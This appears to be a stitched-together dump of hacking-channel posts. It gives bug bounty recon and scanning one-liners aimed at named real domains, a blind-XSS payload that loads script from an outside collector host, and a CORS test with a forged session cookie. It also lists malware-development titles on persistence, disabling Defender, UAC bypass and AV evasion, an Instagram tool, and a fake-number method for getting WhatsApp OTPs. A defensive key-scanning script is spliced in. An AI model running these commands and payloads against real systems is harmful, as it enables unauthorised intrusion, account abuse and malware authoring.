Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
If you want to grab the IPs after getting the ASN record, you can use this one-liner:
whois -h whois.radb.net -- '-i origin AS8983' | grep -Eo "([0-9.]+){4}/[0-9]+" | sort -u > ipranges.txt && cat ipranges.txt | mapcidr -silent | dnsx -ptr -resp-only | sort -u > ptrrecords.txt && cat ptrrecords.txt | anew -q subs.txt
Methodology one:
First step: collect as many subdomains as you can. I use subfinder with all my API keys (VirusTotal, Censys, Shodan, etc.). There is no need for many other subdomain-finding tools; it is enough with all API keys + crt.sh, manual + automation.
The -recursive flag is used for fetching subdomains of subdomains, called sub-subdomains, for example amazon.amazoncloud.amazon.com; many people miss this part. The -all switch fetches from all sources with all API keys.
subfinder -d google.com -all -recursive > subdomain.txt
This one-liner fetches all subdomains from crt.sh:
curl -s "https://crt.sh/?q=amazon.com&output=json" | jq -r '.[].name_value' | grep -Po '(\w+\.\w+\.\w+)$'
Normally people use the default httpx command and only filter subdomains on port 443 or 80, but many domains have a dashboard, control panel or login panel on port 8080, 8888 or 8000, so always include these ports.
cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt
For checking open ports I use naabu; it is very fast. With it I can check the open ports and which service is running on each port, and whether it is a vulnerable version, so I can exploit that service. That is why port enumeration is important.
naabu -list subdomain.txt -c 50 -nmap-cli 'nmap -sV -sC' -o naabu-full.txt
And for checking for hidden directories and files I use dirsearch with the onelistforall wordlist, which contains many directories and files used on the web, and I include only the status codes that are important. With this you can find many sensitive disclosures of files and directories. I don't use ffuf because it gives results with a lot of waste, and it also gets blocked by domains for its fast brute-forcing. That's why I like dirsearch, with its colorful and clean output and fewer errors.
dirsearch -l subdomains_alive.txt -i 200,204,403 -x 500,502,429 -R 5 --random-agent -t 50 -F -w /home/coffinxp/oneforall/onelistforallshort.txt -o directory.txt
Now, for fetching all URLs from the archives from many sources I use gau rather than wayback, because it uses many sources and it is all passive. You can use katana for active URLs and anew with those files. Afterwards, use uro to filter out duplicate params.
cat subdomains_alive.txt | gau > newparms.txt
cat newparms.txt | uro > filterparm.txt
And for JS files that contain sensitive keys and passwords I use the grep command; you can also fetch them with katana using the -jc flag for active JS endpoints.
cat filterparm.txt | grep "\.js$" > jsfiles.txt
And for secret keys I use a SecretFinder one-liner, or you can send them to a custom nuclei secret finder that gives clean results; I will send you that.
cat jsfiles.txt | while read -r url; do python3 /home/coffinxp/SecretFinder/SecretFinder.py -i "$url" -o cli >> secret.txt; done
And then grep all the keys:
cat secret.txt | grep aws
cat secret.txt | grep -i "google.captcha"
cat secret.txt | grep twilio
And last, I send all params to nuclei, which contains all types of vulnerabilities, with my custom templates; I will share them with you all soon after adding more.
Before this, if you want to separate vulnerabilities and find them with another tool specially made for that purpose: for XSS use dalfox, for open redirect use openredirex, for LFI use dotdotpwn & LFI Suite. Filter these with gf patterns so you only get valid params for that vulnerability, and send them to nuclei with that specific vulnerability tag: --tags xss
nuclei -list sorted_wordlist_100000.txt -t /home/coffinxp/Custom-Nuclei-Templates/
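The JavaScript secret-grep step in the methodology above (grepping for aws, google captcha and twilio), shown as an added example that is not part of the original post: a check you can run over your own bundles before shipping, reporting each finding by type and line. The function names, the pattern table and the sample bundle are this example's own, and every sample value is constructed.

```shell
#!/bin/sh
# Added example: type and locate hard-coded keys in a JavaScript file.
# Key formats are the publicly documented ones; all sample values are constructed.

# One "label regex" pair per line (POSIX extended regular expressions).
PATTERNS='aws_access_key_id (AKIA|ASIA)[0-9A-Z]{16}
twilio_account_sid AC[0-9a-f]{32}
google_recaptcha_key 6L[0-9A-Za-z_-]{38}'

# scan_js FILE: print "label<TAB>line<TAB>match" for every finding.
# -w requires the match to stand alone, so longer tokens that merely
# start like a key are not reported; -o prints only the matched key.
scan_js() {
  printf '%s\n' "$PATTERNS" | while read -r label regex; do
    grep -nowE -e "$regex" "$1" | while IFS=: read -r line match; do
      printf '%s\t%s\t%s\n' "$label" "$line" "$match"
    done
  done
}

# count_hits FILE LABEL: number of findings of one type.
count_hits() {
  scan_js "$1" | awk -F'\t' -v want="$2" '$1 == want { n++ } END { print n + 0 }'
}

# make_sample: write a constructed bundle to a temp file and print its path.
make_sample() {
  sample_file=$(mktemp)
  cat >"$sample_file" <<'EOF'
// constructed sample bundle, no real credentials
const cfg = {
  awsKey: "AKIAIOSFODNN7EXAMPLE",
  notAKey: "AKIAIOSFODNN7EXAMPLEEXTRA",
  twilioSid: "AC0123456789abcdef0123456789abcdef",
  captcha: '6LdEXAMPLE_constructed-key-000000000000A',
};
EOF
  printf '%s\n' "$sample_file"
}

demo=$(make_sample)
scan_js "$demo"
rm -f "$demo"
```

The `notAKey` line is the near miss: it starts like an access key ID but is longer, so the whole-word match leaves it out.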
Bug Hunting methodology
-------------------------------------------------------------------------
subfinder -d viator.com -all -recursive > subdomain.txt
cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt
katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt
cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config"
cat allurls.txt | grep -E "\.js$" >> js.txt
cat js.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/
echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30
dirsearch -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json
subfinder -d viator.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters
subzy run --targets subdomain.txt --concurrency 100 --hide_fails --verify_ssl
python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"
nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors
nuclei -list ~/vaitor/subdomains_alive.txt -tags cves,osint,tech
cat allurls.txt | gf lfi | nuclei -tags lfi
cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect
Malware development: persistence - part 1. Registry run keys. C++ example.
Malware development: persistence - part 2. Screensaver hijack. C++ example.
Malware development: persistence - part 3. COM DLL hijack.
Malware development: persistence - part 4. Windows services. Simple C++ example.
Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.
Malware development: persistence - part 6. Windows netsh helper DLL. Simple C++ example.
Malware AV evasion: part 7. Disable Windows Defender. Simple C++ example.
Malware AV evasion - part 8. Encode payload via Z85 algorithm. C++ example.
Malware AV evasion - part 9. Encrypt base64 encoded payload via RC4. C++ example.
Malware AV/VM evasion - part 10: anti-debugging. NtGlobalFlag. Simple C++ example.
Malware AV/VM evasion - part 11: encrypt payload via DES. Simple C++ example.
Malware AV/VM evasion - part 12: encrypt/decrypt payload via TEA. Simple C++ example.
Malware AV/VM evasion - part 13: encrypt/decrypt payload via Madryga. Simple C++ example.
Malware AV/VM evasion - part 14: encrypt/decrypt payload via A5/1. Bypass Kaspersky AV. Simple C++ example.
Malware AV/VM evasion - part 15: WinAPI GetModuleHandle implementation. Simple C++ example.
Malware AV/VM evasion - part 16: WinAPI GetProcAddress implementation. Simple C++ example.
Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe. Simple C++ example.
Malware AV/VM evasion - part 18: encrypt/decrypt payload via modular multiplication-based block cipher. Simple C++ example.
Malware development: persistence - part 22. Windows Setup. Simple C++ example.
Malware and cryptography 1: encrypt/decrypt payload via RC5. Simple C++ example.
Malware and cryptography 20: encrypt/decrypt payload via Skipjack. Simple C++ example.
Malware and cryptography 21: encrypt/decrypt payload via WAKE. Simple C++ example.
Malware development: persistence - part 23. LNK files. Simple Powershell example.
Malware development: persistence - part 24. StartupApproved. Simple C example.
Malware and cryptography 22: encrypt/decrypt payload via XTEA. Simple C++ example.
Malware and cryptography 23: encrypt/decrypt file via TEA. Simple C/C++ example.
Malware and cryptography 24: encrypt/decrypt file via Madryga. Simple C/C++ example.
Malware and cryptography 25: encrypt/decrypt payload via RC6. Simple C/C++ example.
Credit: https://t.me/Devexploit
🧵 A Guide to Starting Your Bug Bounty Journey
1/ 🐞 Don't focus too much on CTFs. The bugs you find there rarely exist in real targets. CTFs are great for learning, but real-world hunting is a different game.
2/ 🏆 Avoid starting on platforms like HackerOne, Bugcrowd, or Intigriti. The competition is fierce, making it tough to find your first bug. Start with Vulnerability Disclosure Programs (VDPs) instead. You'll have a better chance and less discouragement.
3/ 🔍 Focus on one type of vulnerability at a time. IDOR is a great starting point. Master one attack vector before moving to the next, like SSRF, XSS, SSTI, or RCE. Specialization helps build strong skills.
4/ 💡 Be smart about where to inject your payloads. Tailor them to your target's tech stack. For APIs, use backend-specific payloads. Avoid generic payloads that don't match the target's technology.
5/ 📚 Read hacktivity on platforms like HackerOne. These are real bugs on real targets. It's one of the best ways to learn effective attack methods.
6/ 🛠️ Don't rely on default nuclei templates. Create custom ones to avoid duplicates. Customization can give you an edge.
7/ 🤝 Collaborate with experienced hackers. Learn from those who have already found vulnerabilities. Knowledge sharing is invaluable.
8/ 🐦 Join Twitter (or X). Top hackers share tons of valuable information there. Take notes, ask questions, and don't be shy. The worst that can happen is no response, and that's okay.
9/ 💸 Avoid paid tools as a beginner. First, learn the ropes. Once you start earning, consider investing in them. Smart investments come after gaining knowledge and experience.
10/ 🔍 Master Google dorking. It's a crucial skill for any hacker. The ability to find sensitive information through search engines is invaluable.
11/ 🛠️ Found an exploit on Google Hacking Database? Verify it! Ensure the target uses the relevant tech stack. Use Docker to replicate the environment and test the exploit on your local setup. This method sets apart pros from script kiddies.
12/ 🧠 Learn some coding. Understanding the technology you're hacking is essential. Each exploit is different, and knowing the tech helps you adapt your approach.
13/ 🔥 Success in bug bounties comes with hard work. Read source code, understand endpoints, and go beyond brute-forcing. Dedication and effort pay off. If you’re willing to put in the work, you can achieve significant success.
14/ 🌟 Remember, it's a marathon, not a sprint. With persistence and smart strategies, you can achieve your goals. If I can do it, so can you. Let's get to work! 🚀 #BugBounty #CyberSecurity #Hacking
TOOLSIG (INSTAGRAM TOOLS)
DEFAULT OR BASIC USAGE
$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js
TUTORIAL ON PC/LAPTOP [OS]
# Download & Install Git for Windows (32/64bit)
# Download & Install NodeJs for Windows (Recommend Use NodeJS LTS (32/64bit))
# Download File toolsig (https://s.id/2yGC6) & Extract the file
# Right Click (Mouse/Touchpad) In "toolsig-master" Folder & Choose Git Bash Here!
$ npm i
$ node index.js
TUTORIAL ON TERMUX [ANDROID]
$ pkg upgrade && pkg update
$ pkg install git
$ pkg install nodejs-lts
$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js
Tutorial on C9io/CodeAnywhere [WEB-CLOUD-BASED]
$ Login c9.io/login | https://codeanywhere.com/login
$ Select & Install Workspace + Package NodeJS
$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js
📂 𝗧𝗘𝗥𝗠𝗨𝗫 𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘 𝗔𝗡𝗗𝗥𝗢𝗜𝗗 𝗘𝗧𝗛𝗜𝗖𝗔𝗟 𝗛𝗔𝗖𝗞𝗜𝗡𝗚 𝗧𝗨𝗧𝗢𝗥𝗜𝗔𝗟 📂
🖥 Description : The Termux Complete Android Ethical Hacking Tutorial is a comprehensive guide that teaches users how to use the Termux app on their Android devices for ethical hacking purposes. The tutorial covers various hacking techniques and tools that can be used within the Termux environment, including information gathering, vulnerability scanning, password cracking, network monitoring, and more. It provides step-by-step instructions, commands, and examples to help users understand and apply these techniques effectively. This tutorial is suitable for beginners and intermediate users who are interested in learning ethical hacking on their Android devices
FAKE INTERNATIONAL NUMBERS MAKING METHOD
1. Download Any 2nd WhatsApp
2. Download https://2ndline-second-phone-number.en.softonic.com/android/download
Download APK Not On Playstore
3. After Download, Create An Account: Give Any Gmail Account And Password
4. Then Give All Access, But Do Not Give Location Access
5. Put 705 In Country Code And Next
6. Choose Any Number
7. Done You Create Number Successful
8. Go Any 2nd WhatsApp And Paste Your International Number And Country Code Is +1
9. Request The OTP By Call. The First Time The OTP Will Not Come; Wait 2 Min, Then Resend The OTP By Call Again. The Call Will Come; Enter The OTP
10. Now Your International WhatsApp Is Done
Violation Form: https://help.instagram.com/contact/383679321740945
Bully Form: https://help.instagram.com/contact/188391886430254
Human Pfp/Imp Form: https://help.instagram.com/contact/636276399721841
Sex Offender Form: https://help.instagram.com/contact/334013860059654
Copyright Form: https://help.instagram.com/contact/552695131608132
Underage Form: https://help.instagram.com/contact/723586364339719
Indian Grievance Officer Form: https://help.instagram.com/contact/779201836048501
Remembering Form: https://help.instagram.com/contact/1474899482730688
Trademark Form: https://help.instagram.com/contact/230197320740525
